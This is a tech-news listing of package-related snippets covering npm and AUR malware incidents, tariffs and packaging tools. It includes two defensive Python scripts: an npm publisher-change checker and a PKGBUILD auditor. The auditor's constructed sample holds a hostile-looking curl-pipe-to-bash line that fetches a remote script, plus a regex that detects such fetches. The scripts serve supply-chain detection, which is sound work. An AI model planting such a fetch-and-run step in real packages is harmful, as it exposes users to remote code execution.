Latest Tech News

Filtered by: package

Tesla hands $29B comp package to Elon Musk amid ‘AI talent war’

Tesla’s board of directors has announced a new compensation package for CEO Elon Musk worth around $29 billion in shares, with the company citing the “ever-intensifying AI talent war and Tesla’s position at a critical inflection point” as reasons for the payout. The massive pay package is being allocated through a 2019 Equity Incentive Plan that is already approved by shareholders, so it won’t go to a vote, according to a regulatory filing and Ann Lipton, a professor at the University of Colora

Tesla asks shareholders to approve $29B comp package for Elon Musk amid ‘AI talent war’

Tesla’s board of directors has announced a proposed compensation package for CEO Elon Musk that would be worth around $29 billion in shares, with the company citing the “ever-intensifying AI talent war and Tesla’s position at a critical inflection point” as reasons for the payout. The new plan will be put to a vote at the company’s annual shareholder meeting, which is scheduled for November. It will also be entirely voided if the Delaware Supreme Court decides to overturn a judge’s January 2024

Trump Ends Tariff Exemption for Small Packages

US President Donald Trump just dealt another blow to the embattled ecommerce industry, which is still reeling from sweeping tariffs Trump announced in the spring. On Wednesday, Trump signed an executive order widening the impact of those tariffs and making it more expensive for Americans to buy foreign products on sites like eBay, Etsy, and Amazon. The order eliminates the so-called “de minimis” provision, a long-standing policy that allowed people in the US to import packages valued at less th

Flaw in Gemini CLI coding tool could allow hackers to run nasty commands

Researchers needed less than 48 hours with Google’s new Gemini CLI coding agent to devise an exploit that made a default configuration of the tool surreptitiously exfiltrate sensitive data to an attacker-controlled server. Gemini CLI is a free, open-source AI tool that works in the terminal environment to help developers write code. It plugs into Gemini 2.5 Pro, Google’s most advanced model for coding and simulated reasoning. Gemini CLI is similar to Gemini Code Assist except that it creates or

Supply-chain attacks on open source software are getting out of hand

It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users. The latest target, according to security firm Socket, is JavaScript code available on repository npm. A total of 10 packages available from the npm page belonging to global talent agency Toptal contained malware and were downloaded by roughly 5,000 users be

Hackers breach Toptal GitHub account, publish malicious npm packages

Hackers compromised Toptal's GitHub organization account and used their access to publish ten malicious packages on the Node Package Manager (NPM) index. The packages included data-stealing code that collected GitHub authentication tokens and then wiped the victims' systems. Toptal is a freelance talent marketplace that connects companies with software developers, designers, and finance experts. The company also maintains internal developer tools and design systems, most notably Picasso, which

NPM package ‘is’ with 2.8M weekly downloads infected devs with malware

The popular NPM package 'is' has been compromised in a supply chain attack that injected backdoor malware, giving attackers full access to compromised devices. This occurred after maintainer accounts were hijacked via phishing, followed by unauthorized owner changes that went unnoticed for several hours, potentially compromising many developers who downloaded the new releases. The 'is' package is a lightweight JavaScript utility library that provides a wide variety of type checking and value v
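The Toptal and 'is' incidents above share a pattern: a release published by an account that never published the package before, after a maintainer change nobody noticed for hours. The npm registry's packument for a package (GET https://registry.npmjs.org/<package>) carries enough to check for exactly that: a top-level "maintainers" list and, per version, the "_npmUser" that published it. The script below is an added example for this listing, not code from npm or from the articles; the packument it parses is constructed by hand, and the package and account names in it are made up.

```python
"""Spot npm releases that look like an account takeover: a version published
by an account that never published this package before, and past publishers
that have since been removed from the maintainer list.

Added example, not code from npm or from the articles above. The packument is
constructed; the field names ("versions", "_npmUser", "time", "dist-tags",
"maintainers") are the ones the npm registry returns for a package."""
import json

# Constructed sample: one release by the long-time maintainer, then two
# releases by an account that never published this package before, while
# the long-time maintainer has vanished from the "maintainers" list.
SAMPLE_PACKUMENT = json.loads("""
{
  "name": "example-util",
  "dist-tags": {"latest": "3.3.1"},
  "maintainers": [{"name": "newowner", "email": "newowner@example.invalid"}],
  "time": {
    "created": "2019-03-01T00:00:00.000Z",
    "3.2.0": "2024-01-10T12:00:00.000Z",
    "3.3.0": "2024-06-02T09:30:00.000Z",
    "3.3.1": "2024-06-02T09:41:00.000Z"
  },
  "versions": {
    "3.2.0": {"version": "3.2.0", "_npmUser": {"name": "longtime-dev", "email": "dev@example.invalid"}},
    "3.3.0": {"version": "3.3.0", "_npmUser": {"name": "newowner", "email": "newowner@example.invalid"}},
    "3.3.1": {"version": "3.3.1", "_npmUser": {"name": "newowner", "email": "newowner@example.invalid"}}
  }
}
""")


def _semver_key(version):
    """Order plain x.y.z versions numerically (pre-release tags are not handled)."""
    return tuple(int(part) for part in version.split("."))


def first_time_publishers(packument):
    """(version, account) for every release whose publisher had not published
    an earlier release of this package. The very first release is never flagged."""
    versions = packument["versions"]
    seen = set()
    flagged = []
    for version in sorted(versions, key=_semver_key):
        publisher = versions[version].get("_npmUser", {}).get("name", "<unknown>")
        if seen and publisher not in seen:
            flagged.append((version, publisher))
        seen.add(publisher)
    return flagged


def publishers_dropped_from_maintainers(packument):
    """Accounts that published a release but are no longer maintainers: the
    owner-change side of a takeover, which the release list alone does not show."""
    current = {m["name"] for m in packument.get("maintainers", [])}
    past = {v.get("_npmUser", {}).get("name") for v in packument["versions"].values()}
    past.discard(None)
    return sorted(past - current)


def describe(packument):
    """Human-readable summary of both checks for one packument."""
    lines = [f"{packument['name']}: latest={packument['dist-tags'].get('latest')}"]
    for version, account in first_time_publishers(packument):
        lines.append(f"  {version} published {packument['time'].get(version)} by new account {account}")
    for account in publishers_dropped_from_maintainers(packument):
        lines.append(f"  past publisher {account} is no longer a maintainer")
    return "\n".join(lines)


if __name__ == "__main__":
    print(describe(SAMPLE_PACKUMENT))
```

A hit from either check is a prompt to look before upgrading, not proof of compromise: maintainers do hand projects over legitimately. What it buys you is that the hand-over becomes visible at the moment you pull the new version, rather than hours later when someone else notices.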

npm 'accidentally' removes Stylus package, breaks builds and pipelines

npm has taken down all versions of the real Stylus library and replaced them with a "security holding" page, breaking pipelines and builds worldwide that rely on the package. A security placeholder webpage is typically displayed when malicious packages and libraries are removed by the admins of npmjs.com, the world's largest software registry primarily used for JavaScript and Node.js development. But that isn't quite the case for Stylus: a legitimate "revolutionary" library receiving 3 million

OSS Rebuild: open-source, rebuilt to last

Today we're excited to announce OSS Rebuild, a new project to strengthen trust in open source package ecosystems by reproducing upstream artifacts. As supply chain attacks continue to target widely-used dependencies, OSS Rebuild gives security teams powerful data to avoid compromise without burden on upstream maintainers. The project comprises: Automation to derive declarative build definitions for existing PyPI (Python), npm (JS/TS), and Crates.io (Rust) packages. SLSA Provenance for thousan

Installing apps on Linux? 4 ways it's different than any other OS - and mistakes to avoid

When I first started using Linux in the late 90s, there was really only one way to install an application. You would download the app, unpack the archive, run the ./configure command, build the app with make, and then install it with make install. Inevitably, when you ran through that course, you would stumble because of dependencies and have to locate the dependency, run through the same process as you just did (only with the new software), and then find out the ne

Debcraft – Easiest way to modify and build Debian packages

Debian packaging is notoriously hard. Far too many new contributors give up while trying, and many long-time contributors leave due to burnout from having to do too many thankless maintenance tasks. Some just skip testing their changes properly because it feels like too much toil. Debcraft is my attempt to solve this by automating all the boring stuff, and making it easier to learn the correct practices and helping new and old packagers better track changes in both source code and build artifac

Arch Linux pulls AUR packages that installed Chaos RAT malware

Arch Linux has pulled three malicious packages uploaded to the Arch User Repository (AUR) that were used to install the CHAOS remote access trojan (RAT) on Linux devices. The packages were named "librewolf-fix-bin", "firefox-patch-bin", and "zen-browser-patched-bin," and were uploaded by the same user, "danikpapas," on July 16. The packages were removed two days later by the Arch Linux team after being flagged as malicious by the community. "On the 16th of July, at around 8pm UTC+2, a malicious AU

Firefox-patch-bin, librewolf-fix-bin AUR packages contain malware

On the 16th of July, at around 8pm UTC+2, a malicious AUR package was uploaded to the AUR. Two other malicious packages were uploaded by the same user a few hours later. These packages were installing a script coming from the same GitHub repository that was identified as a Remote Access Trojan (RAT). The affected malicious packages are: - librewolf-fix-bin - firefox-patch-bin - zen-browser-patched-bin The Arch Linux team addressed the issue as soon as they became aware of the situation. As of to
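The two AUR items above describe packages whose payload was a script pulled from a GitHub repository rather than anything from the browsers' own upstream. Since AUR packages are plain PKGBUILD files that you are expected to read before running makepkg, the things to look for are mechanical: a source= entry fetched from a host that is not the project's upstream, a static download with its checksum set to SKIP, and a curl or wget hidden inside a build or package function. The auditor below is an added example for this listing, not code from Arch Linux or from the advisory; the PKGBUILD it checks is constructed (the package name and the download host are made up, with raw.githubusercontent.com standing in for "a script coming from a GitHub repository"), and the parser handles the common PKGBUILD shapes only.

```python
"""Audit a PKGBUILD before building it: flag sources fetched from hosts other
than the expected upstream, static sources with no checksum, and network
fetches buried inside build/package functions.

Added example, not code from Arch Linux or from the advisory above. The
PKGBUILD is constructed; the parser assumes simple scalar assignments,
arrays with no ')' inside their values, and functions closed by '}' at the
start of a line, which covers typical AUR packages but not every bash form."""
import re
from urllib.parse import urlparse

SAMPLE_PKGBUILD = r'''
pkgname=browser-patch-bin
pkgver=1.0
pkgrel=1
arch=('x86_64')
url="https://downloads.example.invalid/browser"
source=("browser-${pkgver}.tar.xz::https://downloads.example.invalid/browser-${pkgver}.tar.xz"
        "patch.sh::https://raw.githubusercontent.com/someuser/somerepo/main/patch.sh")
sha256sums=('SKIP' 'SKIP')

package() {
    install -Dm755 patch.sh "$pkgdir/usr/bin/browser-patch"
    curl -fsSL https://raw.githubusercontent.com/someuser/somerepo/main/stage2.sh | bash
}
'''

_SCALAR = re.compile(r'^(\w+)=(?!\()(.*)$', re.M)          # name=value, not arrays
_ARRAY = re.compile(r'^(\w+)=\((.*?)\)', re.M | re.S)       # name=( ... ), no ')' inside
_WORD = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\S+)')         # quoted or bare array items
_FUNC = re.compile(r'^(\w+)\(\)\s*\{\n(.*?)^\}', re.M | re.S)
_FETCH = re.compile(r'\b(curl|wget|git\s+clone)\b.*')       # network use inside a function
VCS_SCHEMES = ("git", "hg", "svn", "bzr", "fossil")         # SKIP is normal for these


def _expand(value, scalars):
    """Expand $var / ${var} using the PKGBUILD's own scalar assignments."""
    return re.sub(r'\$\{?(\w+)\}?', lambda m: scalars.get(m.group(1), m.group(0)), value)


def _words(body):
    """Split an array body into its quoted or bare items."""
    return [next((g for g in m if g), "") for m in _WORD.findall(body)]


def parse_pkgbuild(text):
    scalars = {k: v.strip().strip('"\'') for k, v in _SCALAR.findall(text)}
    arrays = {name: [_expand(w, scalars) for w in _words(body)]
              for name, body in _ARRAY.findall(text)}
    # "localname::url" entries: keep only the fetch location
    sources = [s.split("::", 1)[-1] for s in arrays.get("source", [])]
    sums = next((v for k, v in arrays.items() if k.endswith("sums")), [])
    functions = dict(_FUNC.findall(text))
    return {"scalars": scalars, "sources": sources, "sums": sums, "functions": functions}


def audit_pkgbuild(text, trusted_hosts):
    """Return (finding, detail) tuples; an empty list means nothing was flagged."""
    pkg = parse_pkgbuild(text)
    findings = []
    for i, src in enumerate(pkg["sources"]):
        parsed = urlparse(src)
        if not parsed.scheme:
            continue  # local file shipped alongside the PKGBUILD, not fetched
        host = parsed.hostname or ""
        if host not in trusted_hosts:
            findings.append(("untrusted_source_host", f"{host}: {src}"))
        is_vcs = parsed.scheme.split("+")[0] in VCS_SCHEMES
        if i < len(pkg["sums"]) and pkg["sums"][i] == "SKIP" and not is_vcs:
            findings.append(("unverified_checksum", f"source[{i}] {src}"))
    for name, body in pkg["functions"].items():
        for m in _FETCH.finditer(body):
            findings.append(("network_fetch_in_function", f"{name}(): {m.group(0).strip()}"))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_pkgbuild(SAMPLE_PKGBUILD, {"downloads.example.invalid"}):
        print(f"{kind}: {detail}")
```

The trusted-host set is per package and is the part you have to supply yourself: for a browser rebuild it is the browser project's release host, and a package whose name promises a patched browser but whose sources or functions reach anywhere else is the case the advisory describes. A fetch inside package() is the worst of the three findings, because it bypasses the checksum list entirely and runs at install time on every machine that builds the package.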

North Korean XORIndex malware hidden in 67 malicious npm packages

North Korean threat actors planted 67 malicious packages in the Node Package Manager (npm) online repository to deliver a new malware loader called XORIndex to developer systems. The packages collectively count more than 17,000 downloads and were discovered by researchers at package security platform Socket, who assess them to be part of the continued Contagious Interview operation. Socket researchers say that the campaign follows threat activity detected since April. Last month, the same acto

Solving Wordle with uv's dependency resolver

Introduction In a previous life, I wrote a Sudoku solver that relied on Poetry's dependency resolver. We ended up selling that startup to EDB (not because of the Poetry hack), which means that they now own this IP. And, since then, Python packaging has advanced, with uv taking the world by storm. This means that it's time for a refresh. Can we use uv instead of Poetry? And can we solve a Wordle instead of a Sudoku? For the impatient: you can get the solver from my GitHub. Run uv run main.py r

Got a suspicious UPS text? Don't reply - it might be a scam. Here's how to tell

I've been anxiously expecting a package from UPS. That's why a text I received the other day caught my eye. Claiming to be from UPS, the message said that the carrier attempted to deliver the package on June 27, but the delivery couldn't be completed. The date was one when my wife and I were away, so this seemed legitimate at first glance. However, I've written plenty of

Ubuntu: Introducing Debcrafters

Earlier this year, Canonical’s Ubuntu Engineering organisation gained a new team, seeded with some of our most prolific contributors to Ubuntu. Debcrafters is a new team dedicated to the maintenance of the Ubuntu Archive. The team’s primary goal is to maintain the health of the Ubuntu Archive, but its unique construction aims to attract a broad range of Linux distribution expertise; contributors to distributions like Debian, Arch Linux, NixOS and others are encouraged to join the team, and will

Why Go Rocks for Building a Lua Interpreter

By Roxy Light I recently needed to build a custom Lua interpreter in Go. The exact reasons aren't important for this blog post, but neither the reference implementation (which I will be referring to as "C Lua" throughout this article) nor the other open source Go Lua interpreters I could find were a good fit for my needs. Building a Lua interpreter ended up being a rather enjoyable months-long side quest. I've had a number of folks ask me to write about the experience since these sorts of proj

uv: An extremely fast Python package and project manager, written in Rust

uv: An extremely fast Python package and project manager, written in Rust. Installing Trio's dependencies with a warm cache. Highlights: uv is backed by Astral, the creators of Ruff. Installation: Install uv with our standalone installers:

    # On macOS and Linux.
    curl -LsSf https://astral.sh/uv/install.sh | sh
    # On Windows.
    powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"

Or, from PyPI:

    # With pip.
    pip install uv
    # Or pipx.
    pipx install uv

If installed